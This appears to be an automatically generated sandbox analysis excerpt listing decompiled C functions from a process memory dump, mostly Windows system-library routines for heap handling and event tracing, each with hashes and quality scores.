                                                                                                            • Opcode Fuzzy Hash: 6e302188008d36a21481c5ca9e54b962e2d9df92bd2326ac2defc709aefa6231
                                                                                                            • Instruction Fuzzy Hash: BF012CB1A0021DAFCB04DFA9D9419EEBBB8EF58310F50405AF905E7341D734A901CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E01138ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				short _v62;
                                                                                                            				char _v68;
                                                                                                            				signed char* _t29;
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t41;
                                                                                                            				intOrPtr _t42;
                                                                                                            				signed int _t43;
                                                                                                            
                                                                                                            				_t40 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t43;
                                                                                                            				_v28 = __ecx;
                                                                                                            				_v62 = 0x1c2a;
                                                                                                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                                                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                                                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                                                            				_v24 = __edx;
                                                                                                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t29 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v68);
                                                                                                            				_push(0x1c);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t29 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                                                            			}



















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cad305492db10bd8ba07d444e52bdd57526578e2f8cdecf5288158427b5f9ef
                                                                                                            • Instruction ID: f79e0c3d89c5187722c443d0b8ee6c3dd4f5f6f1346432033069c5a95eb15c66
                                                                                                            • Opcode Fuzzy Hash: 9cad305492db10bd8ba07d444e52bdd57526578e2f8cdecf5288158427b5f9ef
                                                                                                            • Instruction Fuzzy Hash: 1A111E70A04219DFDB04DFA8D541BAEBBF4FF08300F5442AAE558EB382E6349940CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106DB60(signed int __ecx) {
                                                                                                            				intOrPtr* _t9;
                                                                                                            				void* _t12;
                                                                                                            				void* _t13;
                                                                                                            				intOrPtr _t14;
                                                                                                            
                                                                                                            				_t9 = __ecx;
                                                                                                            				_t14 = 0;
                                                                                                            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                                                            					_t13 = 0xc000000d;
                                                                                                            				} else {
                                                                                                            					_t14 = E0106DB40();
                                                                                                            					if(_t14 == 0) {
                                                                                                            						_t13 = 0xc0000017;
                                                                                                            					} else {
                                                                                                            						_t13 = E0106E7B0(__ecx, _t12, _t14, 0xfff);
                                                                                                            						if(_t13 < 0) {
                                                                                                            							L0106E8B0(__ecx, _t14, 0xfff);
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                                            							_t14 = 0;
                                                                                                            						} else {
                                                                                                            							_t13 = 0;
                                                                                                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *_t9 = _t14;
                                                                                                            				return _t13;
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                            • Instruction ID: 02da0e26a296afcf2b74462bee3c9367f9679002b7ef7722c6a905b6e1f3538f
                                                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                            • Instruction Fuzzy Hash: D4F06833345623DBD7326AD98894F5BBA9D9F92A60F190075F2C59B24CCA64880297D1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                                            				signed char* _t13;
                                                                                                            				intOrPtr _t22;
                                                                                                            				char _t23;
                                                                                                            
                                                                                                            				_t23 = __edx;
                                                                                                            				_t22 = __ecx;
                                                                                                            				if(E01087D50() != 0) {
                                                                                                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                            				} else {
                                                                                                            					_t13 = 0x7ffe0384;
                                                                                                            				}
                                                                                                            				if( *_t13 != 0) {
                                                                                                            					_t13 =  *[fs:0x30];
                                                                                                            					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t13 = 0x7ffe0385;
                                                                                                            					} else {
                                                                                                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                            					}
                                                                                                            					if(( *_t13 & 0x00000020) == 0) {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					return E010E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                                            				} else {
                                                                                                            					L3:
                                                                                                            					return _t13;
                                                                                                            				}
                                                                                                            			}







                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                            • Instruction ID: 3a34fc4c23689dc9a09c093867a6275987d7d58d99b6b463c754af80ccefbc4e
                                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                            • Instruction Fuzzy Hash: 08018132304681EBD322A75DC804FAD7BDDFF51B54F0940A5FA94CB6B2D679C800C615
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E010FFE87(intOrPtr __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed int _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				short _v54;
                                                                                                            				char _v60;
                                                                                                            				signed char* _t21;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t32;
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr _t34;
                                                                                                            				signed int _t35;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t35;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_v54 = 0x1722;
                                                                                                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t21 = 0x7ffe0382;
                                                                                                            				} else {
                                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                                            				}
                                                                                                            				_push( &_v60);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee3a7e5955e2603f062ed36392773fcc258b289bff255e073b9760930870cc98
                                                                                                            • Instruction ID: bf51fe27cb22ec992adc0978944406a745ed4bd93e8c0edd3aee7549612c9cf4
                                                                                                            • Opcode Fuzzy Hash: ee3a7e5955e2603f062ed36392773fcc258b289bff255e073b9760930870cc98
                                                                                                            • Instruction Fuzzy Hash: 7C016271A04209EFCB14DFA8D542AAEB7F4EF18704F5041A9A954DB382D635D901CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 48%
                                                                                                            			E0112131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				short _v50;
                                                                                                            				char _v56;
                                                                                                            				signed char* _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t30;
                                                                                                            				intOrPtr _t31;
                                                                                                            				signed int _t32;
                                                                                                            
                                                                                                            				_t29 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t32;
                                                                                                            				_v20 = _a4;
                                                                                                            				_v12 = _a8;
                                                                                                            				_v24 = __ecx;
                                                                                                            				_v16 = __edx;
                                                                                                            				_v50 = 0x1021;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t18 = 0x7ffe0380;
                                                                                                            				} else {
                                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            				}
                                                                                                            				_push( &_v56);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                            			}
















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 238b22d47dad998a05ce389d9af65def0a2a645a281f2c5f99447c5854bfd2ff
                                                                                                            • Instruction ID: 194ffff74c00afc1112fc21c1f823bc7ef482e6780b34024cdd1b1b027090ec6
                                                                                                            • Opcode Fuzzy Hash: 238b22d47dad998a05ce389d9af65def0a2a645a281f2c5f99447c5854bfd2ff
                                                                                                            • Instruction Fuzzy Hash: 9E018C71A04258AFCB04EFE8D505AAEB7F4FF18300F40406AF845EB381E6349A00CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 48%
                                                                                                            			E01138F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				short _v50;
                                                                                                            				char _v56;
                                                                                                            				signed char* _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t30;
                                                                                                            				intOrPtr _t31;
                                                                                                            				signed int _t32;
                                                                                                            
                                                                                                            				_t29 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t32;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_v50 = 0x1c2c;
                                                                                                            				_v24 = _a4;
                                                                                                            				_v20 = _a8;
                                                                                                            				_v12 = __edx;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t18 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v56);
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x402);
                                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                            			}
















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d27a20967185795165c84036f4cd9730a5164653fa9b4edb2adb5ab79d5b42d
                                                                                                            • Instruction ID: 0df51291f3f622622206fc44d8ce0d7358e5aa6df5b496352adfc07d5f8c62d5
                                                                                                            • Opcode Fuzzy Hash: 5d27a20967185795165c84036f4cd9730a5164653fa9b4edb2adb5ab79d5b42d
                                                                                                            • Instruction Fuzzy Hash: 17014F74A0420DEFDB04EFA8D545AAEB7F4EF58300F50406AB955EB381EB34DA00CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E01121608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				short _v46;
                                                                                                            				char _v52;
                                                                                                            				signed char* _t15;
                                                                                                            				intOrPtr _t21;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t28;
                                                                                                            				signed int _t29;
                                                                                                            
                                                                                                            				_t26 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t29;
                                                                                                            				_v12 = _a4;
                                                                                                            				_v20 = __ecx;
                                                                                                            				_v16 = __edx;
                                                                                                            				_v46 = 0x1024;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t15 = 0x7ffe0380;
                                                                                                            				} else {
                                                                                                            					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            				}
                                                                                                            				_push( &_v52);
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t15 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                                            			}















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9ff13b655d448074aaa2573b35e96837c4f06682fe362ab912a57a0acbf5b9c
                                                                                                            • Instruction ID: d49ffea095adbb1476a785e5117b76c1672610340d4cb53e662281eaa5b10f06
                                                                                                            • Opcode Fuzzy Hash: d9ff13b655d448074aaa2573b35e96837c4f06682fe362ab912a57a0acbf5b9c
                                                                                                            • Instruction Fuzzy Hash: CDF06271A04258EFDB14EFE8D505AAEB7F4EF18300F444069E955EB381E6749900CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0108C577(void* __ecx, char _a4) {
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t17;
                                                                                                            				void* _t19;
                                                                                                            				void* _t20;
                                                                                                            				void* _t21;
                                                                                                            
                                                                                                            				_t18 = __ecx;
                                                                                                            				_t21 = __ecx;
                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0108C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                            					__eflags = _a4;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						L10:
                                                                                                            						E011388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                            						L9:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                            					if(__eflags == 0) {
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}










                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f20def78394b0a7761ee3f9944f05e53cf9040b91aebb43e4cbc94dd7ff3c92
                                                                                                            • Instruction ID: 053ffd9a922e33e1bf55b0b15e98aff5f26b49a3fa7b3e67277a8d36e311d24f
                                                                                                            • Opcode Fuzzy Hash: 3f20def78394b0a7761ee3f9944f05e53cf9040b91aebb43e4cbc94dd7ff3c92
                                                                                                            • Instruction Fuzzy Hash: E4F06DB29196909AFF66A7188244BA17FF49B05670F4484A6E5C687512C7A4DCC0C270
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E01122073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                            				void* __esi;
                                                                                                            				signed char _t3;
                                                                                                            				signed char _t7;
                                                                                                            				void* _t19;
                                                                                                            
                                                                                                            				_t17 = __ecx;
                                                                                                            				_t3 = E0111FD22(__ecx);
                                                                                                            				_t19 =  *0x115849c - _t3; // 0xf6f1653
                                                                                                            				if(_t19 == 0) {
                                                                                                            					__eflags = _t17 -  *0x1158748; // 0x0
                                                                                                            					if(__eflags <= 0) {
                                                                                                            						E01121C06();
                                                                                                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                                            						__eflags = _t3;
                                                                                                            						if(_t3 != 0) {
                                                                                                            							L5:
                                                                                                            							__eflags =  *0x1158724 & 0x00000004;
                                                                                                            							if(( *0x1158724 & 0x00000004) == 0) {
                                                                                                            								asm("int3");
                                                                                                            								return _t3;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                                            							__eflags = _t3 - 3;
                                                                                                            							if(_t3 == 3) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t3;
                                                                                                            				} else {
                                                                                                            					_t7 =  *0x1158724; // 0x0
                                                                                                            					return E01118DF1(__ebx, 0xc0000374, 0x1155890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                                            				}
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1da1eda6c1e4a05423090f9bc00c4a4faac375bd02f17eecf2336281523118b
                                                                                                            • Instruction ID: cbfe72b0a861b68ba28c0cf663e0f67046fa329dfff585c38d8118fddc10db56
                                                                                                            • Opcode Fuzzy Hash: e1da1eda6c1e4a05423090f9bc00c4a4faac375bd02f17eecf2336281523118b
                                                                                                            • Instruction Fuzzy Hash: CFF0A02A8156A58ADF3EAB2E61013ED6F92D756114B4904A5D9A01B209C73888E3CB68
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E010A927A(void* __ecx) {
                                                                                                            				signed int _t11;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_t11 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                                            				if(_t11 != 0) {
                                                                                                            					E010AFA60(_t11, 0, 0x98);
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                                            					E010A92C6(_t11, _t14);
                                                                                                            				}
                                                                                                            				return _t11;
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                            • Instruction ID: d2d35f15ea84b437be74bad45d252715d9fd673a9aef274f9f8ed718e3f5872b
                                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                            • Instruction Fuzzy Hash: 8FE02B323405016BE7119E49CC80F87379DDF92724F044078B5005E242C6E5DC0887A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 43%
                                                                                                            			E01138D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				short _v42;
                                                                                                            				char _v48;
                                                                                                            				signed char* _t12;
                                                                                                            				intOrPtr _t18;
                                                                                                            				intOrPtr _t24;
                                                                                                            				intOrPtr _t25;
                                                                                                            				signed int _t26;
                                                                                                            
                                                                                                            				_t23 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t26;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_v42 = 0x1c2b;
                                                                                                            				_v12 = __edx;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t12 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v48);
                                                                                                            				_push(8);
                                                                                                            				_push(0x20402);
                                                                                                            				_push( *_t12 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                            			}














                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d08f242ab5503b0b9e06e81535d3641a10ca6c176b96d5e3919366cb3fa366da
                                                                                                            • Instruction ID: 7397d246a0ea1618662a6525c5c57d81cbd6b596ce970fe372e7e50e79c2d68f
                                                                                                            • Opcode Fuzzy Hash: d08f242ab5503b0b9e06e81535d3641a10ca6c176b96d5e3919366cb3fa366da
                                                                                                            • Instruction Fuzzy Hash: F3F0B470A047089FDB18EFB8D545AAE77B4EF58300F508099F955EB281DA34D900C754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 36%
                                                                                                            			E01138B58(intOrPtr __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v20;
                                                                                                            				short _v46;
                                                                                                            				char _v52;
                                                                                                            				signed char* _t11;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t22;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr _t24;
                                                                                                            				signed int _t25;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t25;
                                                                                                            				_v20 = __ecx;
                                                                                                            				_v46 = 0x1c26;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t11 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v52);
                                                                                                            				_push(4);
                                                                                                            				_push(0x402);
                                                                                                            				_push( *_t11 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                            			}














                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 268990216e6460816329757df8eaeff25536396a73a3200724b10751a73a7ce3
                                                                                                            • Instruction ID: 21028815cdea20b742c013adde15bd172dcec76ae648430c68acd1b0fd3b7e40
                                                                                                            • Opcode Fuzzy Hash: 268990216e6460816329757df8eaeff25536396a73a3200724b10751a73a7ce3
                                                                                                            • Instruction Fuzzy Hash: 3DF0E2B0A04259AFDB08EBA8D906EAE77B4EF04300F400099BA01DB384EB34D900C794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 88%
                                                                                                            			E0108746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                                            				signed int _t8;
                                                                                                            				void* _t10;
                                                                                                            				short* _t17;
                                                                                                            				void* _t19;
                                                                                                            				intOrPtr _t20;
                                                                                                            				void* _t21;
                                                                                                            
                                                                                                            				_t20 = __esi;
                                                                                                            				_t19 = __edi;
                                                                                                            				_t17 = __ebx;
                                                                                                            				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                                            					if(__ecx == 0) {
                                                                                                            						E0107EB70(__ecx, 0x11579a0);
                                                                                                            					} else {
                                                                                                            						asm("lock xadd [ecx], eax");
                                                                                                            						if((_t8 | 0xffffffff) == 0) {
                                                                                                            							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                                            							E010A95D0();
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L10:
                                                                                                            				}
                                                                                                            				_t10 = _t19 + _t19;
                                                                                                            				if(_t20 >= _t10) {
                                                                                                            					if(_t19 != 0) {
                                                                                                            						 *_t17 = 0;
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t10;
                                                                                                            				goto L10;
                                                                                                            			}










                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4c59dadad4169852b1c0e890a1972c6ddd1250faf95e0f10c45213bb9a8cc00
                                                                                                            • Instruction ID: 12e9aa86250b51318a81b31a938eebe0d56d6d92bd4372939b72c94c723ecd16
                                                                                                            • Opcode Fuzzy Hash: b4c59dadad4169852b1c0e890a1972c6ddd1250faf95e0f10c45213bb9a8cc00
